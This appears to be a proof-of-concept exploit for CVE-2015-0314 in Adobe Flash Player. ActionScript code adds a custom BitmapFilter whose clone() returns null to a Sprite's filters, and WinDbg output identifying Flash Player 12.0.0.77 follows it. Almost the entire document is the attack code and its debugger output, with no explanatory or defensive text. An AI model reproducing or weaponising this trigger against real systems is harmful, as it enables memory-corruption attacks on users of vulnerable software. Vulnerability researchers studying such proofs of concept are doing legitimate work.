CVE-2015-0314

1. package {
2.     import flash.display.Sprite;
3.     import flash.filters.*;
4.    
5.     public class PoC extends Sprite {
6.         public function PoC() {
7.             var tmpFilters:Array = this.filters;
8.             tmpFilters.push(new ExploitFilter());
9.             this.filters = tmpFilters;
10.         }
11.     }
12. }
13.  
14. import flash.filters.*;
15. class ExploitFilter extends BitmapFilter
16. {
17.     public function ExploitFilter()
18.     {
19.         return
20.     }
21.    
22.     override public function clone():BitmapFilter
23.     {
24.         return null;
25.     }
26. }
27.  
28.  
29. '''
30. 3ff00000 ??              ???
31. 0:000> lmv m Flash*
32. start    end        module name
33. 00400000 00ecc000   flashplayer_12_0_0_77_sa   (deferred)            
34.    Image path: C:\flashplayer_12.0.0.77_sa.exe
35.    Image name: flashplayer_12.0.0.77_sa.exe
36.    Timestamp:        Tue Mar 04 05:28:21 2014 (5314F3F5)
37.    CheckSum:         009E17CD
38.    ImageSize:        00ACC000
39.    File version:     12.0.0.77
40.    Product version:  12.0.0.77
41.    File flags:       0 (Mask 3F)
42.    File OS:          4 Unknown Win32
43.    File type:        2.0 Dll
44.    File date:        00000000.00000000
45.    Translations:     0409.04b0
46.    CompanyName:      Adobe Systems, Inc.
47.    ProductName:      Shockwave Flash
48.    InternalName:     Adobe Flash Player 12.0
49.    OriginalFilename: SAFlashPlayer.exe
50.    ProductVersion:   12,0,0,77
51.    FileVersion:      12,0,0,77
52.    FileDescription:  Adobe Flash Player 12.0 r0
53.    LegalCopyright:   Adobe® Flash® Player. Copyright © 1996 Adobe Systems Incorporated. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries.
54.    LegalTrademarks:  Adobe Flash Player
55.  
56. '''